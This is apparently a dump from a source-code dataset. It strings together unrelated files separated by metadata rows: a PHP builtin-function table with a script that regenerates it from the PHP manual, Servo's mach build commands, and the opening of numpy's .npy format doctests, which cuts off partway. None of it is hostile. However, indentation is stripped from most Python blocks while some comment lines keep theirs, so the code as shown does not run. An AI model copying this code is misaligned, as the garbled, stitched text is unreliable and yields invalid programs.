'XML Parser': ['utf8_decode',
'utf8_encode',
'xml_error_string',
'xml_get_current_byte_index',
'xml_get_current_column_number',
'xml_get_current_line_number',
'xml_get_error_code',
'xml_parse_into_struct',
'xml_parse',
'xml_parser_create_ns',
'xml_parser_create',
'xml_parser_free',
'xml_parser_get_option',
'xml_parser_set_option',
'xml_set_character_data_handler',
'xml_set_default_handler',
'xml_set_element_handler',
'xml_set_end_namespace_decl_handler',
'xml_set_external_entity_ref_handler',
'xml_set_notation_decl_handler',
'xml_set_object',
'xml_set_processing_instruction_handler',
'xml_set_start_namespace_decl_handler',
'xml_set_unparsed_entity_decl_handler'],
'XML-RPC': ['xmlrpc_decode_request',
'xmlrpc_decode',
'xmlrpc_encode_request',
'xmlrpc_encode',
'xmlrpc_get_type',
'xmlrpc_is_fault',
'xmlrpc_parse_method_descriptions',
'xmlrpc_server_add_introspection_data',
'xmlrpc_server_call_method',
'xmlrpc_server_create',
'xmlrpc_server_destroy',
'xmlrpc_server_register_introspection_callback',
'xmlrpc_server_register_method',
'xmlrpc_set_type'],
'XSLT (PHP 4)': ['xslt_backend_info',
'xslt_backend_name',
'xslt_backend_version',
'xslt_create',
'xslt_errno',
'xslt_error',
'xslt_free',
'xslt_getopt',
'xslt_process',
'xslt_set_base',
'xslt_set_encoding',
'xslt_set_error_handler',
'xslt_set_log',
'xslt_set_object',
'xslt_set_sax_handler',
'xslt_set_sax_handlers',
'xslt_set_scheme_handler',
'xslt_set_scheme_handlers',
'xslt_setopt'],
'Xhprof': ['xhprof_disable',
'xhprof_enable',
'xhprof_sample_disable',
'xhprof_sample_enable'],
'YAZ': ['yaz_addinfo',
'yaz_ccl_conf',
'yaz_ccl_parse',
'yaz_close',
'yaz_connect',
'yaz_database',
'yaz_element',
'yaz_errno',
'yaz_error',
'yaz_es_result',
'yaz_es',
'yaz_get_option',
'yaz_hits',
'yaz_itemorder',
'yaz_present',
'yaz_range',
'yaz_record',
'yaz_scan_result',
'yaz_scan',
'yaz_schema',
'yaz_search',
'yaz_set_option',
'yaz_sort',
'yaz_syntax',
'yaz_wait'],
'YP/NIS': ['yp_all',
'yp_cat',
'yp_err_string',
'yp_errno',
'yp_first',
'yp_get_default_domain',
'yp_master',
'yp_match',
'yp_next',
'yp_order'],
'Yaml': ['yaml_emit_file',
'yaml_emit',
'yaml_parse_file',
'yaml_parse_url',
'yaml_parse'],
'Zip': ['zip_close',
'zip_entry_close',
'zip_entry_compressedsize',
'zip_entry_compressionmethod',
'zip_entry_filesize',
'zip_entry_name',
'zip_entry_open',
'zip_entry_read',
'zip_open',
'zip_read'],
'Zlib': ['gzclose',
'gzcompress',
'gzdecode',
'gzdeflate',
'gzencode',
'gzeof',
'gzfile',
'gzgetc',
'gzgets',
'gzgetss',
'gzinflate',
'gzopen',
'gzpassthru',
'gzputs',
'gzread',
'gzrewind',
'gzseek',
'gztell',
'gzuncompress',
'gzwrite',
'readgzfile',
'zlib_decode',
'zlib_encode',
'zlib_get_coding_type'],
'bcompiler': ['bcompiler_load_exe',
'bcompiler_load',
'bcompiler_parse_class',
'bcompiler_read',
'bcompiler_write_class',
'bcompiler_write_constant',
'bcompiler_write_exe_footer',
'bcompiler_write_file',
'bcompiler_write_footer',
'bcompiler_write_function',
'bcompiler_write_functions_from_file',
'bcompiler_write_header',
'bcompiler_write_included_filename'],
'cURL': ['curl_close',
'curl_copy_handle',
'curl_errno',
'curl_error',
'curl_escape',
'curl_exec',
'curl_file_create',
'curl_getinfo',
'curl_init',
'curl_multi_add_handle',
'curl_multi_close',
'curl_multi_exec',
'curl_multi_getcontent',
'curl_multi_info_read',
'curl_multi_init',
'curl_multi_remove_handle',
'curl_multi_select',
'curl_multi_setopt',
'curl_multi_strerror',
'curl_pause',
'curl_reset',
'curl_setopt_array',
'curl_setopt',
'curl_share_close',
'curl_share_init',
'curl_share_setopt',
'curl_strerror',
'curl_unescape',
'curl_version'],
'chdb': ['chdb_create'],
'dBase': ['dbase_add_record',
'dbase_close',
'dbase_create',
'dbase_delete_record',
'dbase_get_header_info',
'dbase_get_record_with_names',
'dbase_get_record',
'dbase_numfields',
'dbase_numrecords',
'dbase_open',
'dbase_pack',
'dbase_replace_record'],
'dbx': ['dbx_close',
'dbx_compare',
'dbx_connect',
'dbx_error',
'dbx_escape_string',
'dbx_fetch_row',
'dbx_query',
'dbx_sort'],
'filePro': ['filepro_fieldcount',
'filepro_fieldname',
'filepro_fieldtype',
'filepro_fieldwidth',
'filepro_retrieve',
'filepro_rowcount',
'filepro'],
'iconv': ['iconv_get_encoding',
'iconv_mime_decode_headers',
'iconv_mime_decode',
'iconv_mime_encode',
'iconv_set_encoding',
'iconv_strlen',
'iconv_strpos',
'iconv_strrpos',
'iconv_substr',
'iconv',
'ob_iconv_handler'],
'inclued': ['inclued_get_data'],
'intl': ['intl_error_name',
'intl_get_error_code',
'intl_get_error_message',
'intl_is_failure'],
'libxml': ['libxml_clear_errors',
'libxml_disable_entity_loader',
'libxml_get_errors',
'libxml_get_last_error',
'libxml_set_external_entity_loader',
'libxml_set_streams_context',
'libxml_use_internal_errors'],
'mSQL': ['msql_affected_rows',
'msql_close',
'msql_connect',
'msql_create_db',
'msql_createdb',
'msql_data_seek',
'msql_db_query',
'msql_dbname',
'msql_drop_db',
'msql_error',
'msql_fetch_array',
'msql_fetch_field',
'msql_fetch_object',
'msql_fetch_row',
'msql_field_flags',
'msql_field_len',
'msql_field_name',
'msql_field_seek',
'msql_field_table',
'msql_field_type',
'msql_fieldflags',
'msql_fieldlen',
'msql_fieldname',
'msql_fieldtable',
'msql_fieldtype',
'msql_free_result',
'msql_list_dbs',
'msql_list_fields',
'msql_list_tables',
'msql_num_fields',
'msql_num_rows',
'msql_numfields',
'msql_numrows',
'msql_pconnect',
'msql_query',
'msql_regcase',
'msql_result',
'msql_select_db',
'msql_tablename',
'msql'],
'mnoGoSearch': ['udm_add_search_limit',
'udm_alloc_agent_array',
'udm_alloc_agent',
'udm_api_version',
'udm_cat_list',
'udm_cat_path',
'udm_check_charset',
'udm_check_stored',
'udm_clear_search_limits',
'udm_close_stored',
'udm_crc32',
'udm_errno',
'udm_error',
'udm_find',
'udm_free_agent',
'udm_free_ispell_data',
'udm_free_res',
'udm_get_doc_count',
'udm_get_res_field',
'udm_get_res_param',
'udm_hash32',
'udm_load_ispell_data',
'udm_open_stored',
'udm_set_agent_param'],
'mqseries': ['mqseries_back',
'mqseries_begin',
'mqseries_close',
'mqseries_cmit',
'mqseries_conn',
'mqseries_connx',
'mqseries_disc',
'mqseries_get',
'mqseries_inq',
'mqseries_open',
'mqseries_put1',
'mqseries_put',
'mqseries_set',
'mqseries_strerror'],
'mysqlnd_qc': ['mysqlnd_qc_clear_cache',
'mysqlnd_qc_get_available_handlers',
'mysqlnd_qc_get_cache_info',
'mysqlnd_qc_get_core_stats',
'mysqlnd_qc_get_normalized_query_trace_log',
'mysqlnd_qc_get_query_trace_log',
'mysqlnd_qc_set_cache_condition',
'mysqlnd_qc_set_is_select',
'mysqlnd_qc_set_storage_handler',
'mysqlnd_qc_set_user_handlers'],
'qtdom': ['qdom_error', 'qdom_tree'],
'runkit': ['runkit_class_adopt',
'runkit_class_emancipate',
'runkit_constant_add',
'runkit_constant_redefine',
'runkit_constant_remove',
'runkit_function_add',
'runkit_function_copy',
'runkit_function_redefine',
'runkit_function_remove',
'runkit_function_rename',
'runkit_import',
'runkit_lint_file',
'runkit_lint',
'runkit_method_add',
'runkit_method_copy',
'runkit_method_redefine',
'runkit_method_remove',
'runkit_method_rename',
'runkit_return_value_used',
'runkit_sandbox_output_handler',
'runkit_superglobals'],
'ssdeep': ['ssdeep_fuzzy_compare',
'ssdeep_fuzzy_hash_filename',
'ssdeep_fuzzy_hash'],
'vpopmail': ['vpopmail_add_alias_domain_ex',
'vpopmail_add_alias_domain',
'vpopmail_add_domain_ex',
'vpopmail_add_domain',
'vpopmail_add_user',
'vpopmail_alias_add',
'vpopmail_alias_del_domain',
'vpopmail_alias_del',
'vpopmail_alias_get_all',
'vpopmail_alias_get',
'vpopmail_auth_user',
'vpopmail_del_domain_ex',
'vpopmail_del_domain',
'vpopmail_del_user',
'vpopmail_error',
'vpopmail_passwd',
'vpopmail_set_user_quota'],
'win32ps': ['win32_ps_list_procs', 'win32_ps_stat_mem', 'win32_ps_stat_proc'],
'win32service': ['win32_continue_service',
'win32_create_service',
'win32_delete_service',
'win32_get_last_control_message',
'win32_pause_service',
'win32_query_service_status',
'win32_set_service_status',
'win32_start_service_ctrl_dispatcher',
'win32_start_service',
'win32_stop_service'],
'xattr': ['xattr_get',
'xattr_list',
'xattr_remove',
'xattr_set',
'xattr_supported'],
'xdiff': ['xdiff_file_bdiff_size',
'xdiff_file_bdiff',
'xdiff_file_bpatch',
'xdiff_file_diff_binary',
'xdiff_file_diff',
'xdiff_file_merge3',
'xdiff_file_patch_binary',
'xdiff_file_patch',
'xdiff_file_rabdiff',
'xdiff_string_bdiff_size',
'xdiff_string_bdiff',
'xdiff_string_bpatch',
'xdiff_string_diff_binary',
'xdiff_string_diff',
'xdiff_string_merge3',
'xdiff_string_patch_binary',
'xdiff_string_patch',
'xdiff_string_rabdiff']}
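# When this file is executed as a script, the block below regenerates the
# MODULES mapping above by downloading the PHP manual and scraping its
# per-extension function indexes.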
if __name__ == '__main__':
import glob
import os
import pprint
import re
import shutil
import tarfile
try:
from urllib import urlretrieve
except ImportError:
from urllib.request import urlretrieve
PHP_MANUAL_URL = 'http://us3.php.net/distributions/manual/php_manual_en.tar.gz'
PHP_MANUAL_DIR = './php-chunked-xhtml/'
PHP_REFERENCE_GLOB = 'ref.*'
    PHP_FUNCTION_RE = r'<a href="function\..*?\.html">(.*?)</a>'
PHP_MODULE_RE = '<title>(.*?) Functions</title>'
def get_php_functions():
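        # Build a mapping of extension name (taken from each page's <title>)
        # to its function names, skipping methods ('->'/'::') and duplicates.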
function_re = re.compile(PHP_FUNCTION_RE)
module_re = re.compile(PHP_MODULE_RE)
modules = {}
for file in get_php_references():
module = ''
for line in open(file):
if not module:
search = module_re.search(line)
if search:
module = search.group(1)
modules[module] = []
elif 'href="function.' in line:
for match in function_re.finditer(line):
fn = match.group(1)
if '->' not in fn and '::' not in fn and fn not in modules[module]:
modules[module].append(fn)
if module:
# These are dummy manual pages, not actual functions
if module == 'PHP Options/Info':
modules[module].remove('main')
if module == 'Filesystem':
modules[module].remove('delete')
if not modules[module]:
del modules[module]
return modules
def get_php_references():
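        # Download and unpack the PHP manual tarball, then yield every
        # per-extension reference page (files matching 'ref.*').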
download = urlretrieve(PHP_MANUAL_URL)
tar = tarfile.open(download[0])
tar.extractall()
tar.close()
for file in glob.glob("%s%s" % (PHP_MANUAL_DIR, PHP_REFERENCE_GLOB)):
yield file
os.remove(download[0])
def regenerate(filename, modules):
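        # Rewrite this source file in place, replacing only the MODULES
        # literal and leaving the surrounding header and footer untouched.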
f = open(filename)
try:
content = f.read()
finally:
f.close()
header = content[:content.find('MODULES = {')]
footer = content[content.find("if __name__ == '__main__':"):]
f = open(filename, 'w')
f.write(header)
f.write('MODULES = %s\n\n' % pprint.pformat(modules))
f.write(footer)
f.close()
def run():
print('>> Downloading Function Index')
modules = get_php_functions()
total = sum(len(v) for v in modules.values())
print('%d functions found' % total)
regenerate(__file__, modules)
shutil.rmtree(PHP_MANUAL_DIR)
run()
| mit | -7,808,615,889,447,388,000 | 31.437697 | 94 | 0.446781 | false |
walac/servo | python/servo/build_commands.py | 3 | 12824 | # Copyright 2013 The Servo Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
from __future__ import print_function, unicode_literals
import os
import os.path as path
import subprocess
import sys
from time import time
from mach.decorators import (
CommandArgument,
CommandProvider,
Command,
)
from servo.command_base import CommandBase, cd
def is_headless_build():
return int(os.getenv('SERVO_HEADLESS', 0)) == 1
def notify_linux(title, text):
try:
import dbus
bus = dbus.SessionBus()
notify_obj = bus.get_object("org.freedesktop.Notifications", "/org/freedesktop/Notifications")
method = notify_obj.get_dbus_method("Notify", "org.freedesktop.Notifications")
method(title, 0, "", text, "", [], [], -1)
except:
raise Exception("Please make sure that the Python dbus module is installed!")
def notify_win(title, text):
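    # title/text are unused here: instead of a toast, flash the console
    # window's caption and taskbar entry until it regains the foreground.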
    from ctypes import Structure, windll, POINTER, sizeof, WINFUNCTYPE
    from ctypes.wintypes import DWORD, HANDLE, BOOL, UINT
class FLASHWINDOW(Structure):
_fields_ = [("cbSize", UINT),
("hwnd", HANDLE),
("dwFlags", DWORD),
("uCount", UINT),
("dwTimeout", DWORD)]
FlashWindowExProto = WINFUNCTYPE(BOOL, POINTER(FLASHWINDOW))
FlashWindowEx = FlashWindowExProto(("FlashWindowEx", windll.user32))
FLASHW_CAPTION = 0x01
FLASHW_TRAY = 0x02
FLASHW_TIMERNOFG = 0x0C
params = FLASHWINDOW(sizeof(FLASHWINDOW),
windll.kernel32.GetConsoleWindow(),
FLASHW_CAPTION | FLASHW_TRAY | FLASHW_TIMERNOFG, 3, 0)
FlashWindowEx(params)
def notify_darwin(title, text):
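    # Post the message through the OS X user notification center; this needs
    # the pyobjc bindings to be installed.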
try:
import Foundation
import objc
NSUserNotification = objc.lookUpClass("NSUserNotification")
NSUserNotificationCenter = objc.lookUpClass("NSUserNotificationCenter")
note = NSUserNotification.alloc().init()
note.setTitle_(title)
note.setInformativeText_(text)
now = Foundation.NSDate.dateWithTimeInterval_sinceDate_(0, Foundation.NSDate.date())
note.setDeliveryDate_(now)
centre = NSUserNotificationCenter.defaultUserNotificationCenter()
centre.scheduleNotification_(note)
except ImportError:
raise Exception("Please make sure that the Python pyobjc module is installed!")
def notify_build_done(elapsed):
"""Generate desktop notification when build is complete and the
elapsed build time was longer than 30 seconds."""
if elapsed > 30:
notify("Servo build", "Completed in %0.2fs" % elapsed)
def notify(title, text):
"""Generate a desktop notification using appropriate means on
supported platforms Linux, Windows, and Mac OS. On unsupported
platforms, this function acts as a no-op."""
    # sys.platform is "linux2" on Python 2, "linux" on Python 3 and "win32"
    # on Windows.
    platforms = {
        "linux": notify_linux,
        "linux2": notify_linux,
        "win32": notify_win,
        "darwin": notify_darwin
    }
func = platforms.get(sys.platform)
if func is not None:
try:
func(title, text)
except Exception as e:
extra = getattr(e, "message", "")
print("[Warning] Could not generate notification! %s" % extra, file=sys.stderr)
def call(*args, **kwargs):
"""Wrap `subprocess.call`, printing the command if verbose=True."""
verbose = kwargs.pop('verbose', False)
if verbose:
print(' '.join(args[0]))
return subprocess.call(*args, **kwargs)
@CommandProvider
class MachCommands(CommandBase):
@Command('build',
description='Build Servo',
category='build')
@CommandArgument('--target', '-t',
default=None,
help='Cross compile for given target platform')
@CommandArgument('--release', '-r',
action='store_true',
help='Build in release mode')
@CommandArgument('--dev', '-d',
action='store_true',
help='Build in development mode')
@CommandArgument('--jobs', '-j',
default=None,
help='Number of jobs to run in parallel')
@CommandArgument('--android',
default=None,
action='store_true',
help='Build for Android')
@CommandArgument('--debug-mozjs',
default=None,
action='store_true',
help='Enable debug assertions in mozjs')
@CommandArgument('--verbose', '-v',
action='store_true',
help='Print verbose output')
@CommandArgument('params', nargs='...',
help="Command-line arguments to be passed through to Cargo")
def build(self, target=None, release=False, dev=False, jobs=None,
android=None, verbose=False, debug_mozjs=False, params=None):
if android is None:
android = self.config["build"]["android"]
opts = params or []
features = []
base_path = self.get_target_dir()
release_path = path.join(base_path, "release", "servo")
dev_path = path.join(base_path, "debug", "servo")
release_exists = path.exists(release_path)
dev_exists = path.exists(dev_path)
if not (release or dev):
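            # No profile was requested: fall back to the configured default
            # mode, then to whichever build artifact already exists on disk.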
if self.config["build"]["mode"] == "dev":
dev = True
elif self.config["build"]["mode"] == "release":
release = True
elif release_exists and not dev_exists:
release = True
elif dev_exists and not release_exists:
dev = True
else:
print("Please specify either --dev (-d) for a development")
print(" build, or --release (-r) for an optimized build.")
sys.exit(1)
if release and dev:
print("Please specify either --dev or --release.")
sys.exit(1)
self.ensure_bootstrapped()
if release:
opts += ["--release"]
if target:
opts += ["--target", target]
if jobs is not None:
opts += ["-j", jobs]
if verbose:
opts += ["-v"]
if android:
# Ensure the APK builder submodule has been built first
apk_builder_dir = "support/android-rs-glue"
with cd(path.join(apk_builder_dir, "apk-builder")):
status = call(["cargo", "build"], env=self.build_env(), verbose=verbose)
if status:
return status
opts += ["--target", "arm-linux-androideabi"]
if debug_mozjs or self.config["build"]["debug-mozjs"]:
features += ["script/debugmozjs"]
if is_headless_build():
opts += ["--no-default-features"]
features += ["headless"]
if android:
features += ["android_glue"]
if features:
opts += ["--features", "%s" % ' '.join(features)]
build_start = time()
env = self.build_env()
if android:
# Build OpenSSL for android
make_cmd = ["make"]
if jobs is not None:
make_cmd += ["-j" + jobs]
with cd(self.android_support_dir()):
status = call(
make_cmd + ["-f", "openssl.makefile"],
env=self.build_env(),
verbose=verbose)
if status:
return status
openssl_dir = path.join(self.android_support_dir(), "openssl-1.0.1k")
env['OPENSSL_LIB_DIR'] = openssl_dir
env['OPENSSL_INCLUDE_DIR'] = path.join(openssl_dir, "include")
env['OPENSSL_STATIC'] = 'TRUE'
status = call(
["cargo", "build"] + opts,
env=env, cwd=self.servo_crate(), verbose=verbose)
elapsed = time() - build_start
# Generate Desktop Notification if elapsed-time > some threshold value
notify_build_done(elapsed)
print("Build completed in %0.2fs" % elapsed)
# XXX(#7339) Android build is broken
if android:
return 0
return status
@Command('build-cef',
description='Build the Chromium Embedding Framework library',
category='build')
@CommandArgument('--jobs', '-j',
default=None,
help='Number of jobs to run in parallel')
@CommandArgument('--verbose', '-v',
action='store_true',
help='Print verbose output')
@CommandArgument('--release', '-r',
action='store_true',
help='Build in release mode')
def build_cef(self, jobs=None, verbose=False, release=False):
self.ensure_bootstrapped()
ret = None
opts = []
if jobs is not None:
opts += ["-j", jobs]
if verbose:
opts += ["-v"]
if release:
opts += ["--release"]
build_start = time()
with cd(path.join("ports", "cef")):
ret = call(["cargo", "build"] + opts,
env=self.build_env(), verbose=verbose)
elapsed = time() - build_start
# Generate Desktop Notification if elapsed-time > some threshold value
notify_build_done(elapsed)
print("CEF build completed in %0.2fs" % elapsed)
return ret
@Command('build-gonk',
description='Build the Gonk port',
category='build')
@CommandArgument('--jobs', '-j',
default=None,
help='Number of jobs to run in parallel')
@CommandArgument('--verbose', '-v',
action='store_true',
help='Print verbose output')
@CommandArgument('--release', '-r',
action='store_true',
help='Build in release mode')
def build_gonk(self, jobs=None, verbose=False, release=False):
self.ensure_bootstrapped()
ret = None
opts = []
if jobs is not None:
opts += ["-j", jobs]
if verbose:
opts += ["-v"]
if release:
opts += ["--release"]
opts += ["--target", "arm-linux-androideabi"]
env = self.build_env(gonk=True)
build_start = time()
with cd(path.join("ports", "gonk")):
ret = call(["cargo", "build"] + opts, env=env, verbose=verbose)
elapsed = time() - build_start
# Generate Desktop Notification if elapsed-time > some threshold value
notify_build_done(elapsed)
print("Gonk build completed in %0.2fs" % elapsed)
return ret
@Command('build-tests',
description='Build the Servo test suites',
category='build')
@CommandArgument('--jobs', '-j',
default=None,
help='Number of jobs to run in parallel')
@CommandArgument('--release', default=False, action="store_true",
help="Build tests with release mode")
def build_tests(self, jobs=None, verbose=False, release=False):
self.ensure_bootstrapped()
args = ["cargo", "test", "--no-run"]
if is_headless_build():
args += ["--no-default-features", "--features", "headless"]
if release:
args += ["--release"]
return call(
args,
env=self.build_env(), cwd=self.servo_crate(), verbose=verbose)
@Command('clean',
description='Clean the build directory.',
category='build')
@CommandArgument('--manifest-path',
default=None,
help='Path to the manifest to the package to clean')
@CommandArgument('--verbose', '-v',
action='store_true',
help='Print verbose output')
@CommandArgument('params', nargs='...',
help="Command-line arguments to be passed through to Cargo")
def clean(self, manifest_path, params, verbose=False):
self.ensure_bootstrapped()
opts = []
if manifest_path:
opts += ["--manifest-path", manifest_path]
if verbose:
opts += ["-v"]
opts += params
return call(["cargo", "clean"] + opts,
env=self.build_env(), cwd=self.servo_crate(), verbose=verbose)
| mpl-2.0 | -716,463,475,784,871,400 | 34.134247 | 102 | 0.551622 | false |
Denisolt/Tensorflow_Chat_Bot | local/lib/python2.7/site-packages/numpy/lib/tests/test_format.py | 27 | 34230 | from __future__ import division, absolute_import, print_function
r''' Test the .npy file format.
Set up:
>>> import sys
>>> from io import BytesIO
>>> from numpy.lib import format
>>>
>>> scalars = [
... np.uint8,
... np.int8,
... np.uint16,
... np.int16,
... np.uint32,
... np.int32,
... np.uint64,
... np.int64,
... np.float32,
... np.float64,
... np.complex64,
... np.complex128,
... object,
... ]
>>>
>>> basic_arrays = []
>>>
>>> for scalar in scalars:
... for endian in '<>':
... dtype = np.dtype(scalar).newbyteorder(endian)
... basic = np.arange(15).astype(dtype)
... basic_arrays.extend([
... np.array([], dtype=dtype),
... np.array(10, dtype=dtype),
... basic,
... basic.reshape((3,5)),
... basic.reshape((3,5)).T,
... basic.reshape((3,5))[::-1,::2],
... ])
...
>>>
>>> Pdescr = [
... ('x', 'i4', (2,)),
... ('y', 'f8', (2, 2)),
... ('z', 'u1')]
>>>
>>>
>>> PbufferT = [
... ([3,2], [[6.,4.],[6.,4.]], 8),
... ([4,3], [[7.,5.],[7.,5.]], 9),
... ]
>>>
>>>
>>> Ndescr = [
... ('x', 'i4', (2,)),
... ('Info', [
... ('value', 'c16'),
... ('y2', 'f8'),
... ('Info2', [
... ('name', 'S2'),
... ('value', 'c16', (2,)),
... ('y3', 'f8', (2,)),
... ('z3', 'u4', (2,))]),
... ('name', 'S2'),
... ('z2', 'b1')]),
... ('color', 'S2'),
... ('info', [
... ('Name', 'U8'),
... ('Value', 'c16')]),
... ('y', 'f8', (2, 2)),
... ('z', 'u1')]
>>>
>>>
>>> NbufferT = [
... ([3,2], (6j, 6., ('nn', [6j,4j], [6.,4.], [1,2]), 'NN', True), 'cc', ('NN', 6j), [[6.,4.],[6.,4.]], 8),
... ([4,3], (7j, 7., ('oo', [7j,5j], [7.,5.], [2,1]), 'OO', False), 'dd', ('OO', 7j), [[7.,5.],[7.,5.]], 9),
... ]
>>>
>>>
>>> record_arrays = [
... np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('<')),
... np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('<')),
... np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('>')),
... np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('>')),
... ]
Test the magic string writing.
>>> format.magic(1, 0)
'\x93NUMPY\x01\x00'
>>> format.magic(0, 0)
'\x93NUMPY\x00\x00'
>>> format.magic(255, 255)
'\x93NUMPY\xff\xff'
>>> format.magic(2, 5)
'\x93NUMPY\x02\x05'
Test the magic string reading.
>>> format.read_magic(BytesIO(format.magic(1, 0)))
(1, 0)
>>> format.read_magic(BytesIO(format.magic(0, 0)))
(0, 0)
>>> format.read_magic(BytesIO(format.magic(255, 255)))
(255, 255)
>>> format.read_magic(BytesIO(format.magic(2, 5)))
(2, 5)
Test the header writing.
>>> for arr in basic_arrays + record_arrays:
... f = BytesIO()
... format.write_array_header_1_0(f, arr) # XXX: arr is not a dict, items gets called on it
... print(repr(f.getvalue()))
...
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '|u1', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '|u1', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '|i1', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '|i1', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<u2', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<u2', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>u2', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>u2', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<i2', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<i2', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>i2', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>i2', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<u4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<u4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>u4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>u4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<i4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<i4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '>i4', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '<u8', 'fortran_order': False, 'shape': ()} \n"
"F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (15,)} \n"
"F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (3, 5)} \n"
"F\x00{'descr': '<u8', 'fortran_order': True, 'shape': (5, 3)} \n"
"F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (3, 3)} \n"
"F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (0,)} \n"
"F\x00{'descr': '>u8', 'fortran_order': False, 'shape': ()} \n"
